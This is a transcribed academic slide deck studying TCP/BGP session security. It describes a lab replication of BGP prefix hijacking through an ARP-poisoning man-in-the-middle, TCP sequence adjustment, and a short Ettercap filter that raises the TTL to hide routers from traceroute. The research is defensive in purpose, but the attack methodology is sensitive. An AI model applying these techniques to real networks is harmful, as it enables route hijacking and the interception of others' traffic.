a study in tcp/bgp session security
DESCRIPTION
A Study in TCP/BGP Session Security. By Ilias Pallikarakis. Motivation. Inadequate security in BGP Defcon 16 Presentation by Pilosov and Kapela Is it possible to replicate the attacks using a MitM approach ? . BGP Security. Mechanisms currently used : TCP-MD5 - PowerPoint PPT PresentationTRANSCRIPT
![Page 1: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/1.jpg)
A Study in TCP/BGP Session Security
ByIlias Pallikarakis
![Page 2: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/2.jpg)
Motivation
Inadequate security in BGP Defcon 16 Presentation by Pilosov and
Kapela Is it possible to replicate the attacks using a
MitM approach ?
![Page 3: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/3.jpg)
3
BGP Security
Mechanisms currently used : TCP-MD5 Generalized TTL Security Mechanism (GTSM)
Mechanisms to be implemented : TCP-AO RPKI
![Page 4: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/4.jpg)
Defcon 16 Presentation Overview
They successfully advertised fake prefixes.
Made the attack hard to detect by making the router advertising the fake prefixes ‘undetectable’ by the traceroute tool.
![Page 5: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/5.jpg)
Main Goals
Set a MitM attack between two routers and attempt to hijack the BGP session
Implement a script similar to the one of Defcon 16 to hide part of the network
![Page 6: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/6.jpg)
6
Tools Used
Ettercap : MitM (ARP Poison) Network Hiding
Scapy : Network Hiding BGP Session Hijacking
![Page 7: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/7.jpg)
7
Tools Used Ettercap :
Easy to use Good for simple script but not for complex NO user intercation
Scapy : Python library Automatically calculates length/checksum
fields Much slower
![Page 8: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/8.jpg)
8
Testing Network
![Page 9: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/9.jpg)
9
General Methodology
Hide Network : Exploit Traceroute’s function Increase TTL to hide network from traceroute
BGP Session Hijacking: Intercept the BGP update messages Find a specific prefix and alter it
![Page 10: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/10.jpg)
10
BGP Hijacking Issues
Manipulate IP/TCP checksums Manipulate variable length field :
IP Length BGP Header Length BGP Update Length fields
TCP session manipulation
![Page 11: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/11.jpg)
11
TCP Session Manipulation
What if the altered BGP Prefix has different length than the original ?
Need to adjust Sequence/Acknowledgement numbers : Keep the offset and Add/Remove it (Best) Copy previous sequence to next
Acknowledgement and vice versa (Easiest)
![Page 12: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/12.jpg)
12
Sequence Adjusting Mechanism
Next Acknowledgement number is always the previous Sequence + original message’s length
For Sequence number there are 2 cases : The previous message was sent by the
receiver (previous ack) Previous message sent by the sender
(previous forged seq)
![Page 13: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/13.jpg)
13
Example
![Page 14: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/14.jpg)
14
Ettercap TTL Script
In one word Simple… :
if (ip.dst == '1.1.1.1'){ip.ttl += 3;msg("Increase TTL\n");
}
![Page 15: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/15.jpg)
15
Ettercap Script BGP
Not possible : Human processing in Binary. Cannot manipulate variable length fields. Can replace only 2-byte length strings.
![Page 16: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/16.jpg)
16
Scapy Methodology
Scripts are composed by : Main : Create the nfqueue and calls Process Process : mainly filters packets and calls
altering function Altering Function : Varied content, does the
packet altering
![Page 17: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/17.jpg)
17
Scapy BGP issues
Originally Scapy could not understand multiple BGP update messages in the same TCP packet Would read only first update. Incorrect length calculation.
Unexpected session establishment : While a TCP/BGP session was working one of the
routers attempted to setup a new one.
![Page 18: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/18.jpg)
18
BGP Issue Solutions BGP Multiple Update Messages :
Use the Header Marker to find how many messages appear.
Modified original Scapy code for BGP
Unexpected Sessions : Drop all packets where one port is 179 and the
other one is NOT the working session.
![Page 19: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/19.jpg)
19
Cisco Issue : Description
Strange packets observed of the form :
Circumstances of appearance : Change prefix length with Incorrect Seq/Ack Change prefix to lower length with working
Script (occasionally)
![Page 20: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/20.jpg)
20
Cisco Issue : Thoughts
Definitely related with seq/ack numbers. Test showed that when ack is larger issue
always appears. Why it appears in correct script ??
![Page 21: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/21.jpg)
21
Cisco Issue : Thoughts
Test correct script for potential mistake Thoroughly check the TCP flags before the
strange packets. Check strange traffic message by message in
contrast to the same traffic sent by router.
![Page 22: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/22.jpg)
22
Conclusion
Working script (implemented in two different ways !) to increase TTL. Successful traceroute veil. Renders GTSM obsolete.
Working TCP Adjusting Mechanism Could be used in all TCP communication
![Page 23: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/23.jpg)
23
Conclusion
Successfully replaced a prefix with one of our choice with Scapy
Contributed in Scapy BGP allowing multiple Updates to be sent/received
Discovery of Cisco issue
![Page 24: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/24.jpg)
24
Tests
Live Demonstration !
![Page 25: A Study in TCP/BGP Session Security](https://reader036.vdocuments.net/reader036/viewer/2022062315/56816374550346895dd451f9/html5/thumbnails/25.jpg)
Thank You !